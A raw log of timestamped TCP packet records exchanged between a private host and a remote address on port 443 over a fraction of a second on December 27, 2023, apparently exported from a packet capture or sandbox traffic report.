Dec 27, 2023 17:57:21.441011906 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441042900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441060066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.441067934 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441091061 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.441256046 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441277981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441307068 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.441314936 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.441337109 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.442744970 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.442759991 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.442795992 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.442805052 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.442827940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444055080 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444082022 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444122076 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444130898 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444143057 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444329023 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444363117 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444381952 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444391966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444418907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444431067 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444441080 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444447041 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444462061 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444478035 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444492102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444497108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444525957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444547892 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444551945 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444598913 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444622040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444653988 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444659948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444685936 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444751024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444778919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444797993 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444804907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444812059 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444839954 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444868088 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.444943905 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444963932 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.444997072 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445002079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445023060 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445041895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445045948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445122004 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445142031 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445174932 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445182085 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445198059 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445292950 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445326090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445348978 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445357084 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445442915 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445462942 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445488930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445517063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445518970 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445532084 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445547104 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445565939 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445626974 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445650101 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445673943 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445686102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445692062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445715904 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445823908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445842981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.445889950 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445890903 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.445897102 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446237087 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446268082 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446295023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.446300983 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446316004 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.446643114 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446664095 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446696043 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.446702003 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.446719885 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.446991920 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447005033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447041988 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447047949 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447061062 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447334051 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447356939 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447385073 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447391033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447417021 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447684050 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447715044 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447729111 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447737932 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447751045 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447787046 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447794914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.447837114 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.447987080 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448004961 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448035002 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448055029 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448060036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448071957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448132038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448151112 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448182106 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448189020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448218107 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448287964 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448304892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448338032 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448343992 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448364019 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448621035 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448640108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448673010 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448679924 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448731899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448780060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448812008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448837996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448853970 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448863029 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448870897 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448894978 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448945045 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448961020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.448995113 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.448997974 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449018002 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449023962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449035883 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449090004 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449106932 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449137926 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449145079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449173927 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449220896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449255943 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449280024 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449286938 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.449328899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449352026 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.449990988 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450006008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450041056 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450052023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450063944 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450076103 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450177908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450202942 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450227022 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450232983 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450278044 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450433016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450474024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450503111 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450521946 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450522900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450521946 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450536966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450556040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450581074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450591087 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450604916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450629950 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450637102 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450645924 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450659037 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450690031 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450695992 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450721979 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450800896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450829983 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450839043 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450846910 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.450870991 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.450987101 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451010942 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451035023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451036930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451047897 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451064110 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451102018 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451149940 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451164007 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451200962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451201916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451214075 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451226950 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451253891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451256990 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451265097 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451280117 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451294899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451318979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451334000 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451345921 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451384068 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451452971 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451468945 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451505899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451512098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451538086 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451544046 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451553106 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451622009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451644897 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451672077 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451678038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451705933 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451739073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451766014 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451792002 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451800108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451822042 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451915979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451946020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451972008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.451972961 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.451982975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452001095 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452022076 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452115059 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452136040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452167988 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452173948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452193975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452209949 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452213049 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452219963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452239990 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452264071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452270985 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452300072 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452419043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452447891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452483892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452506065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452506065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452512980 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452552080 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452610016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452622890 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452655077 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452661037 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452688932 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452704906 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452712059 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452718019 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452743053 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452754021 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452781916 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452790022 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452796936 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452831030 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452899933 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452917099 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452949047 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.452950954 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452963114 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.452977896 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453000069 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453083038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453097105 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453130007 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453135014 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453141928 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453162909 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453188896 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453202963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453217030 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453248978 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453249931 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453258038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453284025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453397036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453418970 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453444004 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453450918 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453483105 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453501940 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453532934 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453558922 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453566074 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453591108 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453670025 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453705072 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453716993 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453723907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.453759909 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.453780890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.596884012 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.596915960 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.596954107 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.596981049 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.596997023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597018957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597024918 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597378016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597399950 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597429991 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597440004 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597462893 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597495079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597542048 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597547054 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597563982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597594023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597635984 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597665071 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597692013 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597698927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597723007 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597757101 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597784042 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597809076 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597814083 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597826958 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.597839117 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.597862959 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598088980 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598108053 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598139048 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598145008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598166943 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598181963 CET	49737	443	192.168.2.4	52.217.163.105
